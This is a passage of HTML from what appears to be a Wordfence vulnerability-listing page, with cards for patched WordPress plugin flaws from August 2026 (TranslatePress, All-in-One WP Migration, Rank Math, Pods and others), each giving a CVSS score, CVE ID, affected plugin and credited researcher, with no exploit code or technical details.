<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpremote" target="_blank" rel="noopener">The WP Remote WordPress Plugin</a> <span class="wfvr-software-slug">[wpremote]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01f287b6-1720-4ece-9141-f906835b8bae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f4ebf09-b089-4118-a0ee-399243253f9c" target="_blank" rel="noopener">TranslatePress – Multilingual &lt;= 3.3.1 &#8211; Unauthenticated Account Takeover via Password Reset Link Disclosure</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19632" target="_blank" rel="noopener noreferrer">							CVE-2026-19632						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation</a> <span class="wfvr-software-slug">[translatepress-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f4ebf09-b089-4118-a0ee-399243253f9c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4321c8-15a4-46f5-9b0e-2098a7fcfb5b" target="_blank" rel="noopener">WPMU DEV Dashboard &lt;= 5.0.1 &#8211; Authentication Bypass to Administrator via SSO HMAC Canonicalization Confusion</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76581" target="_blank" rel="noopener noreferrer">							CVE-2026-76581						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmudev-updates" target="_blank" rel="noopener">WPMU DEV Dashboard</a> <span class="wfvr-software-slug">[wpmudev-updates]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4321c8-15a4-46f5-9b0e-2098a7fcfb5b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bdb4468a-cd01-4f4c-9353-d77fcf7a558f" target="_blank" rel="noopener">Shared Files Pro &lt; 1.7.68 &amp; Shared Files Free  &lt; 1.7.67 &#8211; Unauthenticated Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12513" target="_blank" rel="noopener noreferrer">							CVE-2026-12513						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files" target="_blank" rel="noopener">Shared Files – File Upload &amp; Download Manager</a> <span class="wfvr-software-slug">[shared-files]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files-pro" target="_blank" rel="noopener">Shared Files Pro</a> <span class="wfvr-software-slug">[shared-files-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1732348be5694e5c9a42ec41f1987218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1732348be5694e5c9a42ec41f1987218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh" target="_blank" rel="noopener">Huynh Kien Minh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bdb4468a-cd01-4f4c-9353-d77fcf7a558f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22e273d9-a268-4dc5-b1f6-3bc5c29232c5" target="_blank" rel="noopener">All-in-One WP Migration and Backup &lt;= 7.109 &#8211; Unauthenticated Second-Order SQL Injection via Archive Restore to Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19949" target="_blank" rel="noopener noreferrer">							CVE-2026-19949						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">All-in-One WP Migration and Backup</a> <span class="wfvr-software-slug">[all-in-one-wp-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd164c6348ca2048a891d26c4106e94a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd164c6348ca2048a891d26c4106e94a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener">Jack Taylor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22e273d9-a268-4dc5-b1f6-3bc5c29232c5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/41308ae8-1b3d-4658-808d-630d6e673f3f" target="_blank" rel="noopener">CM Map Locations &lt;= 2.1.8 &#8211; Authenticated (Subscriber+) Arbitrary File Upload via cmloc_route_image_upload AJAX Action</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16601" target="_blank" rel="noopener noreferrer">							CVE-2026-16601						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cm-map-locations" target="_blank" rel="noopener">CM Map Locations – Visualize and share your locations in a few clicks</a> <span class="wfvr-software-slug">[cm-map-locations]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/41308ae8-1b3d-4658-808d-630d6e673f3f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/207fc33b-ccf6-4c39-976d-41e6a89ad1ec" target="_blank" rel="noopener">InfusedWoo Pro &lt;= 5.1.18 &#8211; Authenticated (Subscriber+) Privilege Escalation via Password Reset Link Disclosure</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19892" target="_blank" rel="noopener noreferrer">							CVE-2026-19892						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/infusedwooPRO" target="_blank" rel="noopener">InfusedWoo Pro</a> <span class="wfvr-software-slug">[infusedwooPRO]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/207fc33b-ccf6-4c39-976d-41e6a89ad1ec" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae75196d-2128-4da8-a90b-a62454dcdbe9" target="_blank" rel="noopener">Mang Board WP &lt;= 2.3.7 &#8211; Authenticated (Subscriber+) Privilege Escalation to Forged Authentication Cookie</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75977" target="_blank" rel="noopener noreferrer">							CVE-2026-75977						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mangboard" target="_blank" rel="noopener">Mang Board WP</a> <span class="wfvr-software-slug">[mangboard]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae75196d-2128-4da8-a90b-a62454dcdbe9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de6256cf-b6c8-4436-83ad-a5494fc48949" target="_blank" rel="noopener">Pods – Custom Content Types and Fields &lt; 3.3.9.1 &#8211; Authenticated (Author+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74851" target="_blank" rel="noopener noreferrer">							CVE-2026-74851						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pods" target="_blank" rel="noopener">Pods – Custom Content Types and Fields</a> <span class="wfvr-software-slug">[pods]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tyler-chin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dfc3bf44cc1da4b86fd64635100766.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dfc3bf44cc1da4b86fd64635100766"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tyler-chin" target="_blank" rel="noopener">Tyler Chin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de6256cf-b6c8-4436-83ad-a5494fc48949" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/36ee4bf3-a4fd-44b1-95c3-0021543a0aa0" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings &lt;= 1.0.276 &#8211; Authenticated (Author+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81757" target="_blank" rel="noopener noreferrer">							CVE-2026-81757						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</a> <span class="wfvr-software-slug">[seo-by-rank-math]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/36ee4bf3-a4fd-44b1-95c3-0021543a0aa0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7397c95e-9aba-4d89-9c18-184480efccd1" target="_blank" rel="noopener">Workeera – AI Job Board with Applicant Tracking System (ATS) &lt; 1.0.6 &#8211; Authenticated (Subscriber+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77018" target="_blank" rel="noopener noreferrer">							CVE-2026-77018						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/workeera-remote-tech-job-board" target="_blank" rel="noopener">Workeera – AI Job Board with Applicant Tracking System (ATS)</a> <span class="wfvr-software-slug">[workeera-remote-tech-job-board]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7397c95e-9aba-4d89-9c18-184480efccd1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01ac87f7-3f09-42cd-a344-05b8bd6b730d" target="_blank" rel="noopener">Classified Listing &#8211; Mobile Number Verification &lt;= 1.6.0 &#8211; Unauthenticated Authentication Bypass via Firebase OTP Login</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15985" target="_blank" rel="noopener noreferrer">							CVE-2026-15985						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rtcl-verification" target="_blank" rel="noopener">Classified Listing &#8211; Mobile Number Verification</a> <span class="wfvr-software-slug">[rtcl-verification]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01ac87f7-3f09-42cd-a344-05b8bd6b730d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f20ead74-6db0-4bd2-82f6-0eb792288d70" target="_blank" rel="noopener">FluentCart A New Era of eCommerce &lt;= 1.6.2 &#8211; Authenticated (Custom+) Arbitrary File Deletion via &#8216;file_path&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-cart" target="_blank" rel="noopener">FluentCart A New Era of eCommerce – Faster, Lighter, and Simpler</a> <span class="wfvr-software-slug">[fluent-cart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f20ead74-6db0-4bd2-82f6-0eb792288d70" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c9ef25-dc57-4a38-84d6-40f38bf96e4e" target="_blank" rel="noopener">Geo Controller &lt;= 8.9.8 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78286" target="_blank" rel="noopener noreferrer">							CVE-2026-78286						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf-geoplugin" target="_blank" rel="noopener">Geo Controller</a> <span class="wfvr-software-slug">[cf-geoplugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45ae3007a457a80b6d668a0c9853b980.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ae3007a457a80b6d668a0c9853b980"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener">Supakiad S.</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c9ef25-dc57-4a38-84d6-40f38bf96e4e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e6984f14-3b89-47f0-8137-26e447cb09f2" target="_blank" rel="noopener">Hash Form – Drag &amp; Drop Form Builder &lt;= 1.4.1 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
